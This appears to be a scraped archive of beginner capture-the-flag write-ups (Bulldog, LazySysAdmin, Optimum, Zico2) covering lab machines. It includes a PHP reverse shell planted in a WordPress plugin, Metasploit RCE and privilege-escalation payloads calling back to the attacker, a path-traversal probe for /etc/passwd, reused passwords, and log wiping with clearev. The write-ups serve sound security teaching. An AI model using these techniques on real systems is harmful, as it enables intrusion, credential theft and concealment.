I do know some basics in gdb and peda, but before we try those, let’s see if it is a gift to be simple. I know that customPermissionApp has been compiled, but there might be some useful human-readable lines in there. We can use the strings command here, and use less to go through it carefully. First, we will need a tty.\nwhich python\nWe’ve got python, so we can run our python tty spawning command.\npython -c 'import pty;pty.spawn(\u0026quot;/bin/bash\u0026quot;)'\nNow we can use less\nstrings customPermissionApp | less\nOkay, let’s see if anything jumps out at us.\nThe first thing I noticed was \u0026ldquo;sudo su root\u0026rdquo; at the bottom. This doesn’t just run a single command as root; it starts an interactive root shell.\n\u0026ldquo;sudo su\u0026rdquo; also requires a password, but the line \u0026ldquo;Usage: ./customPermissionApp \u0026rdquo; doesn’t appear to even ask for one. The note did mention that it only worked for the Django user, too. Could this mean that the password for the Django user is contained within this file?\nWe should read the whole file to try to find something, but let’s start with the section we are already looking at.\nHmm, this isn’t quite readable, but I can make a guess out of it.\nSUPERultH imatePASH SWORDyouH CANTget\nIf you drop those pesky H’s at the end, you get SUPERultimatePASSWORDyouCANTget - which is yelling at us to be tried as a root password. (The H’s are not part of the password: the string is loaded onto the stack in 8-byte chunks by movabs instructions, and the 0x48 REX.W prefix of each following instruction happens to be a printable “H”, so strings glues it onto the end of each chunk. The last chunk is only 7 characters, so it ends in a NUL instead and gets no H.) So, let’s try it out.\nsudo su\npassword: SUPERultimatePASSWORDyouCANTget\nI just love seeing that little #.\nWe own this box now – we are the top (bull)dog! From here we can just go to the /root directory and grab the flag.\ncd /root; ls; cat congrats.txt\nLessons Learned #\nSSH is pretty safe, especially compared to web shells that execute commands directly on the server.\nInput sanitization is hard.\nYou DO need to use those more complicated hashes.\nIf your website is called \u0026ldquo;bulldog\u0026rdquo; - don\u0026rsquo;t make that your password, ya dingus. 
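What strings is really showing in section 6, as an added Python example. The bytes below are constructed to mimic the pattern (a movabs r64, imm64 followed by a store to the stack frame, repeated per 8-byte chunk); they are not copied from customPermissionApp. The point is that a strings-style scan reproduces the SUPERultH / imatePASH / SWORDyouH / CANTget fragments, while walking the opcodes instead recovers the constant cleanly.

```python
import re

# Constructed sample (not bytes from the real binary): four
# `movabs rax, imm64` (48 B8 + 8 immediate bytes), each followed by
# `mov [rbp-X], rax` (48 89 45 XX), which is how a compiler builds a
# short string constant on the stack. The 0x48 REX.W prefix is ASCII 'H'.
SAMPLE = (
    b"\x48\xb8SUPERult\x48\x89\x45\xd0"
    b"\x48\xb8imatePAS\x48\x89\x45\xd8"
    b"\x48\xb8SWORDyou\x48\x89\x45\xe0"
    b"\x48\xb8CANTget\x00\x48\x89\x45\xe8"
)


def strings(data, minlen=4):
    """Behave like `strings -n minlen`: runs of printable ASCII."""
    pattern = rb"[\x20-\x7e]{%d,}" % minlen
    return [m.group().decode("ascii") for m in re.finditer(pattern, data)]


def recover_stack_string(data):
    """Walk the bytes looking for REX.W mov r64, imm64 (48 B8..BF) whose
    8-byte immediate is printable text, and join the immediates in file
    order. Trailing NULs (a short final chunk) are stripped."""
    chunks = []
    i = 0
    while i + 10 <= len(data):
        if data[i] == 0x48 and 0xB8 <= data[i + 1] <= 0xBF:
            imm = data[i + 2:i + 10]
            printable = all(0x20 <= b < 0x7F or b == 0 for b in imm)
            if printable and any(0x20 <= b < 0x7F for b in imm):
                chunks.append(imm.rstrip(b"\x00").decode("ascii"))
                i += 10
                continue
        i += 1
    return "".join(chunks)


if __name__ == "__main__":
    print("strings output:", strings(SAMPLE))
    print("recovered     :", recover_stack_string(SAMPLE))
```

On a real binary you would run recover_stack_string() over the .text section (for instance the bytes pyelftools or objdump give you) rather than the whole file, and expect false positives from any immediate that happens to be printable; the eyeball step the author used is still the final check.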
Thanks to Nick Frichette for a fun box! Looking forward to the sequel!\n","date":"11 November 2017","externalUrl":null,"permalink":"/archive/ctf-writeups/bulldog-vulnhub-nonintro/","section":"Archive","summary":"","title":"CTF Writeup: Bulldog on Vulnhub","type":"archive"},{"content":" Archived Content The items in the archive are frozen in time and will not be updated.\nA fun box from Vulnhub, written by Togie McDogie. You can find it here at https://www.vulnhub.com/entry/lazysysadmin-1,205/\nIntroduction # LazySysAdmin was a fun little box that reminds us to keep it simple. This write up assumes the reader has beginner knowledge of pentesting.\nIt also assumes the reader is using Kali, but all the tools are standard in distros like BlackArch as well. I ran it on my native Kali host machine using VirtualBox; on a host-only network.\nBefore beginning, I added its IP to my hosts file for convenience.\nHere is a very quick summary that is entirely composed of spoilers -\nIt doesn\u0026rsquo;t show my methodology or process. It will tell you how to get the root flag, but you won\u0026rsquo;t learn much. It\u0026rsquo;s also encrypted (weakly) - but if you can root the box using just the spoiler, you\u0026rsquo;ll know how to decode it.\n1. Initial Scans # As always, we start with nmap\nnmap -sV -T4 lazysysadmin.ctf Alright, we have a website, so let\u0026rsquo;s launch our regular HTTP battery. After that we will investigate SMB, MYSQL, and IRC - if we need to. If we figure out the credentials, we can SSH in as well.\nRun dirsearch, nikto, nmap w/ vuln scan, and manually browse the website. Run these scans in parallel.\nI like to run dirsearch twice - a quick scan without specifying a wordlist to find common things, then a deeper dive. 
Even my quick scan uses a large number of extensions - I usually don\u0026rsquo;t run it recursively until I find an interesting starting point, or get stuck and think I need to keep digging.\ndirsearch -u lazysysadmin.ctf -e sh,txt,php,html,htm,asp,aspx,js,xml,log,json,jpg,jpeg,png,gif,doc,pdf,mpg,mp3,zip,tar.gz,tar\nnmap -A -O -T4 --script=vuln lazysysadmin.ctf\nnikto -h http://lazysysadmin.ctf\nIn the browser, I took a peek at the page sources for anything interesting. However, you won\u0026rsquo;t find much there.\nI like steganography (there is some in this guide) - so I read \u0026ldquo;The answer is within you\u0026rdquo; as \u0026ldquo;Check this image for stego.\u0026rdquo; Nothing came up with steghide, strings or stegsolve; so I checked my scan outputs.\nThe first thing I checked was robots.txt - something that the scanners might not be able to do for me. It didn\u0026rsquo;t contain anything too interesting\u0026hellip; unlike my nmap vulnscan, which dumped out a ton of useful info.\n2. Investigating the Website # /wordpress/ suggests we have very fertile ground for planting an attack. WordPress admin access = shell. /phpmyadmin/ suggests there is a database ready to plunder. /info.php gives us kernel, hostname and OS information immediately. I dove right in with\nwpscan -u lazysysadmin.ctf/wordpress/ -e u,v,p\n(this is the old wpscan syntax; current versions take --url and enumerate with -e u,vp,vt) and browsed it myself while it ran.\nwpscan found a bunch of potential vulnerabilities - but I like to start simply. The default username is in use, so maybe the default password will be as well. The only blog post is just my name is togie 50 times - so maybe that’s the password?\nI tried admin:admin, admin:togie, admin:mynameistogie, and admin:password as well as a few capitalized versions. No hits. I think it might be time to look at the other services and see if there is anything there.\n3. 
Investigating the Other Services # SMB might hold some interesting information, and I know that it is running Linux, so I used enum4linux!\nenum4linux lazysysadmin.ctf\nRight off the bat, [+] Server lazysysadmin.ctf allows sessions using username '', password '' looks very promising.\nIt is shortly followed by //lazysysadmin.ctf/share$ Mapping: OK, Listing: OK\nWe connect with a simple\nsmbclient -N '//lazysysadmin.ctf/share$'\n(-N skips the password prompt for the null session, and the quotes keep the shell from touching the $ in the share name) and just press enter if it asks for a password anyway.\nWhat looks interesting or new\u0026hellip; hmm. todolist.txt, deets.txt\u0026hellip; and ooh! A WordPress directory! That might have our website setup in it!\ncd wordpress\nls\nwp-config.php has given me passwords, or at least hashes, in the past. Let\u0026rsquo;s check it out.\nget wp-config.php\nexit\nless wp-config.php\nWhy, hello there\u0026hellip;\nLet\u0026rsquo;s try this password at /phpmyadmin, and maybe we can drop a shell using a select ... into outfile!\nVisit /phpmyadmin and try logging in with Admin:TogieMYSQL12345^^ - and get db access!\n4. Plundering the SQL Database # Alright, let\u0026rsquo;s see what goodies we can find.\nwp_users looks appetizing, let\u0026rsquo;s view it.\nHmm\u0026hellip; maybe not. I tried logging out and back in with root:TogieMYSQL12345^^ - but to no avail.\nThere is the option to try manually inputting SQL commands, so let\u0026rsquo;s try that.\nFirst thing I want to see is if I can write a file - that could allow me to drop a shell script and gain access. I try\nselect 'hello' into outfile 'hello.txt'\nHmm, this user has pretty limited privileges (no FILE privilege, or secure_file_priv is restricting where files may be written). Might be worth trying to view the db contents using SQL commands, however.\nselect * from wp_users from wordpress\nwas forbidden (and that double FROM isn’t valid SQL anyway; the qualified form is select * from wordpress.wp_users), so I tried the more specific\nshow columns from wp_users from wordpress\nuser_pass looks good to me, and some of the other fields aren’t bad either. 
I made sure the wordpress database was selected in phpmyadmin, then ran\nselect user_login, user_pass, user_nicename, user_email from wp_users\nGreat, a hash! Maybe we can crack it. I wonder if it’s the same as the MySQL password…\nWait.\nWe can just try logging in to the WordPress site with that password. Should have tried that first!\n5. Wordpress Admin Access # It’s a gift to be simple…\nLet’s go ahead and drop a PHP shell into one of the plugins.\nI’ve messed this process up before – so I always make a copy of the original text before trying any alterations. This also allows us to revert the plugin back to normal if we give ourselves another way in later.\nFrom /usr/share/webshells/php/ I grab what I like to call the \u0026ldquo;monkey shell\u0026rdquo; (pentestmonkey’s php-reverse-shell.php) and make a copy in my pentest directory.\nI know the plugin code already includes the \u003c?php and ?\u003e tags, so I chop those off and edit in the correct IP and port information.\nThen, we just paste it in at the end of our plugin code.\nNow we can start our listener with\nnc -lnvp PORTNUMBER\nand hit \u0026ldquo;Update File.\u0026rdquo; My shell didn’t pop immediately, but it did after I clicked \u0026ldquo;Installed Plugins\u0026rdquo; again in order to make sure the plugin was active.\nWe\u0026rsquo;ve got a shell, and it is time to enumerate!\n6. Enumerating With www-data # Enumerating a system from the inside can sometimes feel like looking for a needle in a haystack. To be honest, if I lost a needle in a haystack, I’d just go look for another needle. But if I didn’t have another needle, I’d try to use a magnet. That can’t help us here, however.\nThe first thing I tried was looking in the /home folder for goodies left by users.\nNothing here – I usually go right for the bash history to see what the user had been working on, but there isn’t one here.\nMight as well upgrade my shell, too. 
Let’s see if we can run Python, then we might be able to run the python pty.\npython -V\nreturns a version - the box runs python. Let\u0026rsquo;s get a TTY.\npython -c 'import pty;pty.spawn(\u0026quot;/bin/bash\u0026quot;)'\nAfter taking a quick peek at /etc/passwd to see all the usernames, I decided to see if I saw all there was to see on the website.\ncd /var/www/\nls\ncd html\nls\nOh look, the files from the SMB share are here too. Hmm, I got so excited by the wordpress directory that I didn’t even give these a thorough look.\ncat todolist.txt\ncat deets.txt\nWell, well, well. Togie did NOT seem to make it so users can’t see the web root – considering we could see into this directory via SMB. This suggests that togie did NOT remember to change the password either…\nCould this have been lying here the whole time?\nsu togie\nUse password 12345\n7. Call Me Togie! # This togie user seems to be the LazySysAdmin in question. I wonder if they can run anything as superuser.\nsudo -l\nWell, it looks like Togie can run some things as superuser. In fact, Togie can run everything as superuser.\nsudo su\n8. Did I say Togie? Sorry, my name is Oot. Richard Oot. # For presentation’s sake, I logged into SSH – but this is entirely optional and leaves another entry in a log file. While doing the CTF myself, I continued to use the reverse shell.\nSeeing that little # brings a smile to my face.\ncd ~\nls\ncat proof.txt\nLessons Learned #\nTry using passwords in multiple locations; password reuse is rampant.\nIf you have access to a group of files, READ THEM. At least run grep -ri pass over them; that catches password and passwd too.\nDon\u0026rsquo;t leave your web root in a publicly accessible SMB share.\nDon\u0026rsquo;t leave your root password lying around! Or any other, for that matter!\nTogie\u0026rsquo;s Questions: # What could you have done to speed up the enumeration process?\nI dove pretty deeply into HTTP first out of habit, instead of starting with a shallow wade-through of all possibilities. 
In this case, it paid to do a breadth-first enumeration process instead of a depth-first process.\nAre there any obvious things that you missed, which you shouldn\u0026rsquo;t have missed?\nI didn\u0026rsquo;t look at all the files I had access to on the SMB. I found one lead and then just chased it. Had I taken the time to look at all the files, I would have saved a lot of time.\nDid you learn anything interesting? and What have you added to your enumeration process to prevent you from wasting time?\nThe answer to both of these questions is related to breadth-vs-depth searching. I didn\u0026rsquo;t even realize that I was diving deeply instead of lightly browsing everything first.\nThanks Togie McDogie! # Good Luck on your next OSCP!\n","date":"8 November 2017","externalUrl":null,"permalink":"/archive/ctf-writeups/lazysysadmin-vulnhub/","section":"Archive","summary":"","title":"CTF Writeup: LazySysAdmin on VulnHub","type":"archive"},{"content":" Archived Content The items in the archive are frozen in time and will not be updated.\nIntroduction # This was one of my first capture the flags, and the first HTB to go retired while I had a good enough grasp of it to do a write up. The steps are directed towards beginners, just like the box. Almost all the tools mentioned here can be found in a fresh Kali install - if they can\u0026rsquo;t I\u0026rsquo;ll mention it. The write up uses Kali Linux, but the tools used can be installed on/come with many pentesting Linux distributions like Blackarch.\nThe terminal emulator used here is Terminator. It can split windows in half, open tabs and more. You can get it with a simple apt-get install terminator\nA few of the steps in this guide don\u0026rsquo;t return hits - however, they are still important to include as part of the CTF process.\nIn order to do this CTF, you need to have an account on HackTheBox.eu, and be connected to the HTB VPN. 
HackTheBox requires you to \u0026ldquo;hack\u0026rdquo; your way into an invite code - and explicitly forbids anyone from publishing writeups for that process, sorry.\n1. Scan the IP address using nmap # Create a ~/a_pentest folder to save outputs to. cd into this directory before beginning. You might want to have a CTFs folder to save your progress for posterity.\nWhenever you get an IP for a CTF box, nmap is the first thing to do, every time. The HTB IP for this box is 10.10.10.8\nnmap -sV -T4 10.10.10.8 | tee nmap_versionscan.txt\nThe -sV flag tells nmap to attempt to identify the versions of services it detects. -T4 selects the \u0026ldquo;aggressive\u0026rdquo; timing template (shorter timeouts, more probes in flight at once) so the scan finishes faster; it is fine on a lab network but can miss results on a slow or filtered one. | tee nmap_versionscan.txt will output the results to the screen, but also to a file called nmap_versionscan.txt so we can review the results without running another scan.\nnmap scan\n2. Explore the Webpage in the Browser # The scan gives several important pieces of information:\nThe box is running an HTTP Server - that means we can visit a website in a browser, and use our HTTP tools.\nThe HTTP Version: \u0026lsquo;HttpFileServer httpd 2.3\u0026rsquo; - we can look for vulnerabilities in this process.\nThe box is running Windows - this will help us form our strategy.\nThe first thing we should do is visit the web page and poke around.\nThe Website\nAdd the \u0026ldquo;Login\u0026rdquo; area to a \u0026ldquo;might be useful\u0026rdquo; pile in our heads. It has the potential to be a point of attack.\nThe area marked \u0026ldquo;Home\u0026rdquo; has 0 folders, files and bytes. It\u0026rsquo;s unlikely there will be anything stored wherever that\u0026rsquo;s pointing to.\nAt the bottom of the page we see \u0026ldquo;Server Information HTTPFileServer 2.3\u0026rdquo; - this corroborates and confirms our nmap scan results.\nCorrelating pieces of information like this will help us build stable ground for us to build our strategy. This line is clickable. 
It will take us to the HFS project’s own website (Rejetto’s HttpFileServer).\nBefore moving on, we can try to login with some common username and password pairs, as well as some contextual guesses.\nadmin:admin, admin:password, root:password, root:root and admin:fileserver yielded no success.\nIf our other leads don\u0026rsquo;t pan out, we can return to this with a brute forcing tool.\n3. Use Other Tools To Explore The Website Further # The 3 main arrows in my website attack quiver are fimap (for spidering), nikto (for vulnerability analysis) and dirsearch (for page/directory discovery)\nSpidering with fimap # fimap is used to \u0026lsquo;spider\u0026rsquo; the web page - it follows every clickable thing on a page and returns a list of URLs, up to a certain depth. This happens much faster than if we tried to do it manually.\nfimap\nfimap -H -d 3 -u http://10.10.10.8 -w /tmp/fimap_output\nThe -H flag runs fimap in \u0026ldquo;URL Harvesting\u0026rdquo; (web spidering/crawling) mode. -d 3 sets the \u0026ldquo;depth\u0026rdquo; to 3 pages. This means it will explore urls 3 \u0026ldquo;clicks\u0026rdquo; deep. If the first page (A) has 2 clickable links, and those links lead to 2 links each (B), and THOSE links lead to 2 links each (C), fimap will stop looking after the C links. -u http://10.10.10.8 sets our target URL. -w /tmp/fimap_output will save the results to a file called fimap_output in the /tmp directory. If the crawl depth is set too high, we could end up clicking through half the internet! If you use a more complicated spider, such as the ones in OWASP ZAP and Burp Suite, you define a specific scope. This will limit the spider to links within the bounds of what we are trying to investigate.\nOur spidering didn\u0026rsquo;t tell us very much. It only finds one link, which doesn\u0026rsquo;t seem to even lead anywhere at all. So, we move on to the next tool.\nScanning for Vulnerabilities with nikto # nikto is a great vulnerability scanner for web applications. 
It will probe for weaknesses like open directories, setups vulnerable to exploit, and even list filenames it finds interesting - such as robots.txt or /admin\nnikto start\nnikto -h http://10.10.10.8\nThe -h flag sets our target host. By default, nikto only returns \u0026ldquo;noteworthy\u0026rdquo; results to the console and can take some time to run all of its checks. While it runs, let\u0026rsquo;s start another tool while we wait for results.\nPage and Directory Bruteforcing # Not all pages on a website can be reached via clicking - sometimes you just need to know the URL. Instead of making guesses about the existence of pages and manually checking to see if they exist in the browser, there are specialized tools that do this automatically.\nKali includes dirb and DirBuster (an OWASP Java GUI tool that does the same job), which are effective tools. However, I like to use maurosoria\u0026rsquo;s dirsearch. This python3 script bruteforces with a bit more customization and speed than dirb. I cloned the repo into a directory called /opt/Web_Tools/dirsearch - but you can put it wherever you like.\nstarting dirsearch\npython3 (PATH)/dirsearch.py -u http://10.10.10.8 -e txt,html,php | tee dirsearch_results.txt\n-u just sets our URL. -e txt,html,php tells dirsearch to look for .txt, .html and .php files at our host. The default dirsearch wordlist is pretty good, but you can specify another wordlist with -w if you want to. We can start this and go back to check on nikto\nFinishing Up nikto # By this time, our nikto terminal has finished running.\nfinishing nikto\nWhat has it found?\nServer: HFS 2.3 - again confirms that we are running the HTTPFileServer v2.3 - triple confirmation. Everything else refers to vulnerabilities we aren\u0026rsquo;t particularly interested in. 
XSS and clickjacking are vulnerabilities that require user interaction, not something we will need to be concerned with on this CTF (and most other CTFs). Like fimap, nikto did not provide us with too much new information.\nFinishing dirsearch # Let\u0026rsquo;s see if dirsearch has turned up anything interesting.\nfinishing dirsearch\nA favicon is just a little icon that usually appears in a browser tab. dirsearch would have found things like a login.php or an /admin or id_rsa page if they existed.\nOur manual, fimap, nikto, and dirsearch results don\u0026rsquo;t give us too much more to go on than our nmap scan.\nThis makes the information we do have, which has been confirmed multiple times by multiple scans, seem all the more important.\n4. Searching for Exploits and Vulnerabilities # Searchsploit Local Search # The only information we have to go on is that the machine is running HTTPFileServer 2.3.\nDetailed information on what is running on a particular port is a good start. We have the full name of the service, as well as what version it is running. Let\u0026rsquo;s try and exploit it.\nsearchsploit is a tool included in Kali that queries the exploitdb database for your search terms. Many of the exploit scripts come included with it, and others run in Metasploit.\nsearchsploit HTTPFileServer\nsearchsploit HTTPFileServer\nHmm, no luck there. nikto did refer to it as \u0026ldquo;HFS,\u0026rdquo; however\u0026hellip;\nsearchsploit HFS\nWe can check our nmap results to verify that yes, that is our version number.\nHow nice that searchsploit has found so many exploits for that version.\nThere is a Metasploit module with Remote Code Execution, too. RCE leads to shells, and shells lead to root access.\nAlternative Search Method # Did you know you have access to the most powerful source of knowledge ever devised by human beings? 
If you ever have any thirst for knowledge - any question - anything you want to know about large and small, you can ask the Great Oracle of Modern Times, the Sage of Information\u0026hellip;\nYou should just Google it.\nSeriously. We live in the age of Bug Bounties and public disclosure. Unless you discover a 0day vulnerability, odds are a vulnerability can be found by searching online. Looking for a vulnerability in Windows Server? Search for it and soon you\u0026rsquo;ll be reading about EternalBlue and WannaCry. Trying to find vulnerabilities in a certain program? Try searching for the program name and \u0026ldquo;CVE.\u0026rdquo;\nWhat about in our case?\nGoogling HTTPFileServer There it is, Remote Code Execution.\nLet\u0026rsquo;s try another search, including \u0026ldquo;metasploit\u0026rdquo; this time.\nGoogling HTTPFileServer metasploit When I first attempted this box, Google helped me find the exploit module.\n5a. Understanding Metasploit # Metasploit is a very powerful framework for pentesting. Seeing \u0026ldquo;Meterpreter session started\u0026rdquo; is the real life equivalent to that moment on TV when the hacker says \u0026ldquo;I\u0026rsquo;m in!\u0026rdquo; and starts typing faster for some reason.\nThe framework can be a bit tricky to interact with the first time you use it, but the methodology usually follows the same path. Here is a ridiculous analogy.\nIn front of you is a locked door that you know can be opened from the other side. First, you use your advanced dual-channel optical scanners (eyeballs) to see that there is a small space (vulnerability) underneath the door. You can\u0026rsquo;t fit through, but luckily, you have your highly-trained utility hamster. This hamster is able to fit through the space under the door (exploit the vulnerability), and get to the other side. However, without any tools, the hamster won\u0026rsquo;t be able to let you in once it gets across the threshold. 
From your pocket, you pull out your hamster-sized grappling hook (payload) capable of grabbing the door handle on the other side and opening (gaining access to) the door.\nYou point out the space under the door to the hamster, hand him the grappling hook, and set him loose. He deftly scurries under the door, uses his little paws to swing the grappling hook up and over the door handle, and then uses all of his little might to pull down and swing open the door! Access granted, all thanks to our heroic hamster.\nThat hamster\u0026rsquo;s name? Metasploit.\nMetasploit Here is the process:\nIdentify a vulnerability Select the right metasploit Exploit module Set a Payload Provide the appropriate parameters Run the module 5b. Using msfconsole # In our case, our vulnerability is found in the HTTPFileSystem. searchsploit tells us an exploit module exists, and the default payload, the Meterpreter shell, will be very useful.\nAll of our exploits include the term Rejetto when referring to HttpFileServer.\nRun msfconsole to start up the metasploit console and see some nifty ASCII art. Then run search rejetto to find our exploit.\nopen msfconsole It will swiftly find a result.\nfound HFS exploit Our exploit module will be found at exploit/windows/http/rejetto_hfs_exec\nNow, we need to use this exploit:\nuse exploit/windows/http/rejetto_hfs_exec\nYour terminal will acknowledge the exploit has been loaded by turning red.\nIn order to see our parameters, we enter show options\nHFS Options If you look closely, you will see that some parameters are marked \u0026ldquo;yes\u0026rdquo; under the \u0026ldquo;Required\u0026rdquo; Column. All of these required parameters must be set, and sometimes you need to set certain parameters that aren\u0026rsquo;t even listed here.\nMost of the time, your Metasploit payload will require some sort of connection back to your computer. This means the localhost IP, called LHOST by Metasploit, needs to be set. 
If you do not set this manually, Metasploit will attempt to guess what this address is, and it frequently uses the wrong one.\nSince we are connected to the HackTheBox VPN, we want to use our HTB IP, not our local network address. I always forget my IP, but we can quickly run ifconfig in another terminal to see what our tun0 (yours might be tun1 or something else depending on your network setup) address is. All HTB CTF addresses are 10.10.10.xxx and your machine\u0026rsquo;s address will be 10.10.xx.xx.\nThis exploit assumes we want to use the powerful Meterpreter reverse shell as our payload, and since Rejetto runs only on Windows, it will automatically use the Windows version of this payload.\nNow that we know what we are doing, we can set our parameters.\nset RHOST 10.10.10.8 - Tells metasploit Optimum\u0026rsquo;s Address. set LHOST 10.10.xx.xx - Set this to your HTB IP, this is for the meterpreter connection set SRVHOST 10.10.xx.xx - Also set this to your HTB IP, it is for hosting the exploit file. set LPORT 51000 - Set this value to your liking, but I like to use ports \u0026gt; 50,000 since they are dynamic. It is less likely that these ports will already be in use. Initial Rejetto Expl Parameters run - With all our parameters set, we can turn our hamster loose. Initial Meterpreter Session Started Meterpreter session 1 opened We\u0026rsquo;re in. The first thing we\u0026rsquo;ll want to do is gain more information about the system. Meterpreter has a set of commands based on Unix that work no matter what operating system it is running on. You can view a nice SANS cheat sheet of these commands here.\nsysinfo provides system information and helps us get our bearings.\nsysinfo If we look closely, we can see that something\u0026rsquo;s not quite right here. Optimum\u0026rsquo;s architecture is x64. Our meterpreter version is set to x86, not x86_64! 
If we are going to proceed, we are going to need to change this.\nIn your Meterpreter shell, run background to go back to your msfconsole command line. Then run show options again to see what payload Metasploit assumed we wanted to use.\ndefault rejetto parameters This is almost correct. The payload is set to windows/meterpreter/reverse_tcp - which connects back over a TCP port from a Windows machine. However, this doesn\u0026rsquo;t specify an architecture, and defaults to x86, not x86_64. This is easy enough to fix, however. We just need to specify it.\nset payload windows/x64/meterpreter/reverse_tcp\na new meterpreter Since we have the first Meterpreter session still running, we need to set the LPORT again.\nset LPORT 51001 run a new session (Sometimes this exploit will spawn you multiple sessions - just as a bonus! It has given me as many as 5!)\nWith the appropriate Meterpreter session we are able to move forward.\n6. The User Flag and Privilege Escalation # Right off the bat, we should capture the user flag. The HTB convention is to keep the user and root flags in those users\u0026rsquo; home or desktop directories. The user flag will be in a folder belonging to one of the non-root users, while the root flag is in a folder owned by a root or Administrator account.\ngetuid shows what user we are running as. kostas is likely a non-admin user. pwd tells us our current working directory - the User\u0026rsquo;s desktop, how convenient. ls shows the files in this directory - user.txt.txt looks promising. cat user.txt.txt will output the contents of the user flag file to the screen. Copy down the flag hash and submit it on HackTheBox!\nFlag Captured! What should we do next? Any suggestions? # User flag in hand, we need to begin gathering more information about the system. Eventually, we will find something we can use in our efforts to gain admin access. This process can be trial and error, and seems to take time to get good at it. 
Luckily, we have tools.\nOne of the advantages of the Meterpreter shell is scalability. Once you have it running on a machine, privilege escalation is made easier.\npost modules are used post-exploitation, after you already have a Meterpreter shell running on a machine. The local_exploit_suggester post module searches for vulnerabilities and automatically suggests exploits that may be appropriate for what it finds.\nWe\u0026rsquo;ll need to use this module, and point it at our current Meterpreter session.\nRun these commands:\nuse post/multi/recon/local_exploit_suggester set SESSION 2 to point the exploit at our x64 meterpreter session Optionally, run set SHOWDESCRIPTION true if you want to have a detailed explanation of any suggested exploits. run Local Exploit Suggester It ran, but it didn\u0026rsquo;t come up with any suggestions. Let\u0026rsquo;s see if we can find anything ourselves.\nsessions 2 returns us to our x64 Meterpreter session sysinfo provides information to start searching for exploits sysinfo tells us our operating system is Windows 2012 R2 and reminds us we are using x86_64 architecture.\nWe have a technical question - how can we find an answer? # We must beseech the oracle for guidance!\nAsking the Oracle for guidance The first hit gives us a nice MS vulnerability number, MS16-032. The \u0026ldquo;16\u0026rdquo; means it is from 2016, meaning it takes advantage of a relatively new vulnerability - that\u0026rsquo;s a good sign. Let\u0026rsquo;s search for this in Metasploit and see if we have any modules.\nmsfconsole ms16-032 search Jackpot!\n7. Trying Out the Privesc Module and the System Flag # Load it up and give it a whirl.\nuse exploit/windows/local/ms16_032_secondary_logon_handle_privesc show options to see what parameters we need to set ms16-032 default parameters See the Targets Section? We need to specify our architecture again. Make sure our payload has the right architecture too. 
Then, set the other parameters.\nshow targets set TARGET 1 to specify x64 set SESSION 2 Note that this command was run before the screenshot below was taken; it is REQUIRED set PAYLOAD windows/x64/meterpreter/reverse_tcp set LHOST 10.10.xx.xx set LPORT 51003 run Session 4 Started! It worked! We should first see who/where we are, and then see if we can capture the flag.\ngetuid - should output NT AUTHORITY\\SYSTEM. This is Windows-Speak for \u0026ldquo;All-Powerful Admin Root Master\u0026rdquo; pwd - see where we are and how we can navigate to the admin\u0026rsquo;s desktop. cd /Users/ ls - from here we can see all the User directories, including Administrator. cd Administrator/Desktop - we know this is where our flag can be found. ls cat root.txt - system flag captured! System flag captured! 8. Cleanup # Since this is a CTF, cleanup isn\u0026rsquo;t mandatory. However, we want to develop good habits and operational security practice. Meterpreter has a clearev command that can be used to cover our tracks - let\u0026rsquo;s run it and be out of here.\nclearev exit -y - the -y flag answers \u0026ldquo;Kill the session?\u0026rdquo; in advance. Cleaning Up exit -y again will kill the other sessions and exit msfconsole. Thanks for reading! # ","date":"30 October 2017","externalUrl":null,"permalink":"/archive/ctf-writeups/optimum-htb/","section":"Archive","summary":"","title":"CTF Writeup: Optimum on HackTheBox","type":"archive"},{"content":" Archived Content The items in the archive are frozen in time and will not be updated.\nGet the VM here: https://www.vulnhub.com/entry/zico2-1,210/\nIntroduction # My friends and I like to solve CTFs on our own, then teach each other how we solved it. 
This way, we get experience both teaching and learning, and you always understand material you need to explain to someone else better than if you kept it to yourself.\nZico\u0026rsquo;s author rates the box as \u0026ldquo;intermediate,\u0026rdquo; but I\u0026rsquo;d call it \u0026ldquo;beginner plus.\u0026rdquo; The ideas needed to root the box are not complicated, but you need to have a bit of prior knowledge to know that you need to implement them.\nShall we begin?\n1. Initial Scanning # Since we are dealing with a VulnHub VM, we need to set it up on our HOST ONLY network. This box is intentionally vulnerable; why hook it up to your real network?\nDepending on how you\u0026rsquo;ve set up your host-only network, you may need to use nmap to determine the machine\u0026rsquo;s IP.\nnmap -sn 192.168.56.0/24\nOnce you\u0026rsquo;ve found the box, it\u0026rsquo;s time to give it a real portscan. I like to use my benmap script, which runs a few scans and generates a working directory for the CTF. You can check it out on GitHub.\nThe nmap -F scan found some potential avenues of attack:\nSSH on port 22 HTTP on port 80 rpcbind on port 111 HTTP is my favorite place to start on CTFs, so we hit it with the triple threat: nikto, dirsearch and fimap.\nnikto -h 192.168.56.101 -o nikto_result.txt\nNikto tells us that Apache is a bit obsolete, but nothing else particularly interesting. Throw that on our \u0026ldquo;places to dig\u0026rdquo; list and let\u0026rsquo;s use dirsearch.\ndirsearch -u 'http://192.168.56.101' -e php,html,js,txt,sh --simple-report=dirsearch_quick\nWe find a lot of interesting filenames, especially the dbadmin directory. Anything with \u0026ldquo;admin\u0026rdquo; in the title may be worth a look. 
Finally, we\u0026rsquo;ll let fimap see if we can dig anywhere we aren\u0026rsquo;t supposed to be able to.\nfimap -H -d 3 -u \u0026quot;http://192.168.56.101\u0026quot; -w /tmp/fimap_output | tee fimap_result\nhttp://hostname/view.php?page=tools.html smells like file inclusion.\nThe use of ?page= may allow us to directly view arbitrary files on the webserver. Instead of using tools.html as an argument, we just insert a file\u0026rsquo;s full path.\nI tried something like ../../../../etc/passwd, but didn\u0026rsquo;t find success. Maybe we can use this later.\nLastly, we peruse the site in the browser.\nZico\u0026rsquo;s Shop?\nZico doesn\u0026rsquo;t seem confident that he is in control of his own site. Let\u0026rsquo;s prove that he is right to have doubts and go right for that /dbadmin page.\nWhat have we here?\n2. Doing Dirty Deeds in da Database # A php database page, with an obvious version number. The title of \u0026ldquo;testdb\u0026rdquo; hints at a default setup. A default setup may use a default password.\npassword: admin\nWe\u0026rsquo;re inside. Those look like password hashes to me. Our friend Hashbuster should have a look at them.\nNot too shabby! Root and user passwords. I don\u0026rsquo;t think this db is actually used for anything other than testing, but there is a chance that the same passwords are used to login with SSH.\nNope. We can see some other useful information on the database page, however.\nFor one, we are given the test_user database\u0026rsquo;s full file path.\nThis information, combined with the Local File Inclusion vulnerability we spotted earlier means we can access these databases by visiting a URL.\nWe can try some tricks using SQL commands, but I wonder if these waters have been charted before\u0026hellip;\nfindsploit phpliteadmin\nThe very first hit matches our phpLiteAdmin version number.\nIf you run searchsploit -x 24044, you\u0026rsquo;ll see a document explaining how the exploit is operated. 
